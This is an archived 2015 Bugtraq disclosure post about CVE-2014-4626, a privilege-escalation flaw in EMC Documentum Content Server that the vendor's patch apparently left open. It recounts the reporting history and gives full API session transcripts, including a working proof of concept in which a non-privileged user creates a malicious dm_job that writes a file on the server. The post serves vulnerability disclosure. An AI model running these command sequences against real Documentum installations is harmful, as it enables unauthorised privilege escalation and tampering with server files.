| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 1 Jul 2015 16:39:10 +1000
From: <andrew@...filov.tel>
To: "Bugtraq" <bugtraq@...urityfocus.com>
Subject: Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects
Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed
On April 2014 I discovered vulnerability in EMC Documentum Content Server
which allow authenticated user to elevate privileges, hijack Content Server
filesystem or execute arbitrary commands by creating malicious dm_job
objects (for detailed description see VRF#HUFU6FNP.txt and
VRF#HUFV0UZN.txt).
On October 2014 vendor announced ESA-2014-105 which was claiming that
vulnerability has been remediated.
On November 2014 fix was contested (there was significant delay after
ESA-2014-105 because vendor constantly fails to provide status of reported
vulnerabilities) by providing PoC similar to described in VRF#HUGC34JH.txt,
description provided to CERT/CC (another CNA was chosen because vendor
fails to communicate) was:
=================================8<================================
The problem is that non-privileged user is able to create dm_job objects and
execute corresponding docbase methods (some examples of "malicious" methods
are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN), the word "create" here
does mean some sequence of commands which result to existence of dm_job
object. PoC in VRF#HUFU6FNP describes attack on scheduler - scheduler does
not schedule jobs unless they are owned by superuser, so, the command
sequence in that case was: "create dm_job and update dm_job", EMC thinks
that they have fixed vulnerability, but they just fixed the sequence given
in PoC, another sequence is "create dm_sysobject, update dm_sysobject &
change dm_sysobject" - see VRF#HUGC34JH, it's already known attack.
Also, I could provide third PoC related to this report, but I do not think
that would be useful for EMC.
=================================>8================================
Current status of CVE-2014-4626 is obscure, last public status could be
found in CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340):
=================================8<================================
The new exploit is being tracked under PSRC-2494.
This is targeted for Q1 2015 (March patch).
=================================>8================================
Though latest builds of EMC Documentum Content Server successfully pass PoCs
described previously:
=================================8<================================
API> create,c,dm_job
...
08024be980006902
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error:
"Must have system admin privileges or superuser privileges
to change the owner_name to 'dmadmin'."
API> create,c,dm_sysobject
...
08024be980006904
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
OK
API> ?,c,change dm_sysobject object to dm_job
where r_object_id='08024be980006904'
[DM_QUERY_F_CHANGE_SAVE]fatal: "CHANGE: An unexpected save
error has occurred for object 08024be980006904."
[DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error:
"The current user (test) needs to have superuser or sysadmin
privilege to create or save or destroy objects of type (dm_job)."
=================================>8================================
the vulnerability remains unfixed, below is a another PoC (job engine in
Documentum consists of two parts: scheduler and executor, previous attacks
were designed to exploit vulnerability in scheduler, this one demonstrates
how to exploit vulnerability in job executor):
=================================8<================================
API> create,c,dm_job
...
08024be98000690e
API> set,c,l,object_name
SET> malicious job
...
OK
API> set,c,l,inactivate_after_failure
SET> 0
...
OK
API> set,c,l,max_iterations
SET> 0
...
OK
API> set,c,l,method_name
SET> dm_file_writer
...
OK
API> set,c,l,pass_standard_arguments
SET> 0
...
OK
API> set,c,l,run_interval
SET> 1
...
OK
API> set,c,l,run_mode
SET> 1
...
OK
API> set,c,l,run_now
SET> 1
...
OK
API> set,c,l,is_inactive
SET> 0
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> append,c,l,method_arguments
SET> /tmp/test.txt
...
OK
API> append,c,l,method_arguments
SET> agentexec_has_vulnerability
...
OK
API> append,c,l,method_arguments
SET> CREATE
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,agent_exec_method,
ARGUMENTS,S,'
-docbase_name DCTM_DEV.DCTM_DEV
-docbase_owner dmadmin
-job_id 08024be98000690e
-log_directory /u01/documentum/cs/dba/log
-docbase_id 150505
-trace_level 10
'
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES
result : 0
process_id : 91436
launch_failed : F
method_return_val : 0
os_system_error : No Error
timed_out : F
time_out_length : 60
app_server_host_name :
app_server_port : 0
app_server_uri :
error_message :
SYSTEM ATTRIBUTES
APPLICATION ATTRIBUTES
INTERNAL ATTRIBUTES
API> Bye
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
=================================>8================================
__
Regards,
Andrey B. Panfilov
View attachment "VRF#HUFU6FNP.txt" of type "text/plain" (6310 bytes)
View attachment "VRF#HUFV0UZN.txt" of type "text/plain" (5697 bytes)
View attachment "VRF#HUGC34JH.txt" of type "text/plain" (11940 bytes)
Powered by blists - more mailing lists